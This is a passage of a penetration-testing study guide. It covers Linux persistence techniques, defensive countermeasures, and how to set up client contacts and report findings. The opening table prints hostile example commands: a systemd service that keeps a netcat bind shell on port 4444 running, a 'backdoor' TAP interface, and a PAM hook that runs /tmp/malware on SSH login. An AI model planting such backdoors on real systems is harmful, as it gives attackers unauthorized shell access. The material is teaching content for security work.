Abusing Systemd Services	Attackers create or modify systemd service files to run malware at startup.	`nano /etc/systemd/system/persistence.service` `[Service] ExecStart=/bin/bash -c 'while :; do nc -lvnp 4444 -e /bin/bash; done'`
TUN/TAP Abuse	Attackers create virtual network interfaces that persist even after reboot.	`ip tuntap add dev backdoor mode tap`
Abusing PAM (Pluggable Authentication Module)	Modifying PAM authentication files to allow backdoor access.	`echo 'auth required pam_exec.so /tmp/malware' >> /etc/pam.d/sshd`

Metasploit Persistence Modules for Linux

Metasploit provides several modules for establishing persistence on Linux:

post/linux/manage/persistence – Installs a persistent backdoor.
exploit/unix/local/setuid – Exploits misconfigured setuid binaries.
post/linux/gather/enum_cron – Identifies scheduled cron jobs.

Defensive Measures – Detecting & Preventing Persistence

While attackers use these techniques to maintain access, defenders can implement countermeasures to detect and mitigate persistence:

Defense Strategy	Windows Countermeasures	Linux Countermeasures
Monitor Registry Changes	Use Windows Event Logging or Sysmon to track registry modifications.	Track changes in `/etc/passwd`, `/etc/shadow`, and `/etc/init.d/`.
Audit Scheduled Tasks	Regularly check for suspicious scheduled tasks (`schtasks /query`).	List cron jobs using `crontab -l` and `/etc/crontab`.
Detect Unauthorized Services	Review installed services with `Get-Service` or `sc query`.	Check running services with `systemctl list-units --type=service`.
Harden SSH Access	Disable root login (`PermitRootLogin no` in `sshd_config`).	Restrict SSH key authentication (`AuthorizedKeysFile none`).
Monitor New User Accounts	Watch for unexpected user creation events (`Event ID 4720`).	Track `/etc/passwd` modifications.
Scan for Rootkits	Use Windows Defender ATP or Sysinternals tools.	Use `rkhunter` or `chkrootkit` to scan for rootkits.
Enable Logging & SIEM Integration	Integrate logs with SIEM tools like Splunk or ELK.	Use Auditd or OSSEC for real-time monitoring.

By understanding how attackers establish persistence, security teams can implement proactive defenses to detect and eliminate unauthorized access.

Defining the Communication Path in a Penetration Test

Effective communication is crucial during a penetration test to ensure a smooth testing process, proper coordination, and quick response to critical findings or emergencies. Below, we outline the primary types of client contacts and best practices for presenting findings.

Defining Contacts

During a penetration test, you will interact with different stakeholders on the client’s side. Each role has distinct responsibilities that impact the test’s execution and overall success.

1. Primary Contact

Role: Oversees the penetration test from the client’s side.
Who They Are: Typically a CISO, IT Director, or Security Manager.
Responsibilities:
- Approves the scope, objectives, and rules of engagement for the test.
- Acts as the main decision-maker regarding test execution and any changes required.
- Coordinates between internal teams and the penetration testers.

2. Technical Contact

Role: The technical liaison between the penetration testers and the client’s IT/security team.
Who They Are: A network administrator, security engineer, or other IT personnel familiar with the system being tested.
Responsibilities:
- Provides technical information about the environment, including system configurations, IP ranges, and security controls.
- Assists in troubleshooting issues caused by the penetration test (e.g., system crashes, unintended downtime).
- Evaluates the impact of findings and helps determine the urgency of remediation steps.

3. Emergency Contact

Role: The point of contact for critical or urgent issues.
Who They Are: Could be the same as the technical contact or a separate designated person.
Responsibilities:
- Must be reachable during testing hours (24/7 if necessary).
- Handles unexpected incidents, such as service disruptions or security alarms triggered by penetration testing activities.
- Works with internal teams to implement emergency mitigation steps if a critical vulnerability is exploited during testing.

Presenting the Findings

Once the penetration test is completed, findings must be documented in a structured format to help stakeholders understand the risks, impacts, and recommended remediation steps. The Penetration Testing Execution Standard (PTES) outlines best practices for assessing and classifying vulnerabilities.

Vulnerability Classification Levels

To ensure consistency in reporting, vulnerabilities should be categorized based on:

Technical vulnerabilities – Related to software, network, or configuration flaws.
Logical vulnerabilities – Related to business logic, process weaknesses, or misconfigurations that allow unintended behavior.

1. Technical Vulnerabilities

These vulnerabilities exist within the OSI (Open Systems Interconnection) model and are typically discovered through automated and manual testing.

Key Classification Factors:

OSI Layer Vulnerabilities – Network, transport, application layer flaws.
Scanner Found Vulnerabilities – Issues identified using automated tools like Nessus or OpenVAS.
Manually Identified Vulnerabilities – Exploits found through manual testing, such as custom payloads or misconfigurations.
Overall Exposure – How widespread and exploitable the vulnerability is within the environment.

2. Logical Vulnerabilities

These vulnerabilities exist outside traditional OSI model layers and often involve flawed security processes or business logic errors.

Key Classification Factors:

Non-OSI Layer Vulnerability – Issues that do not directly relate to networking layers (e.g., improper access control, weak business logic).
Type of Vulnerability – Authentication bypass, privilege escalation, session management flaws, etc.
How/Where It Is Found – Specific conditions or scenarios in which the vulnerability exists.
Exposure – The likelihood of exploitation and the impact if compromised.

Summary of Results

A penetration test report should contain a concise summary of key findings, categorized by severity:

Critical Vulnerabilities – Immediate risks that require urgent remediation.
High-Risk Vulnerabilities – Exploitable flaws that could cause significant harm.
Medium-Risk Vulnerabilities – Issues that could be leveraged in combination with other attacks.
Low-Risk Vulnerabilities – Minor weaknesses that may not pose an immediate threat but should be addressed.
Informational Findings – Security best practice recommendations or observations.

Providing a well-structured Executive Summary alongside a Technical Report ensures that both non-technical decision-makers and IT/security professionals understand the significance of the findings and the necessary next steps.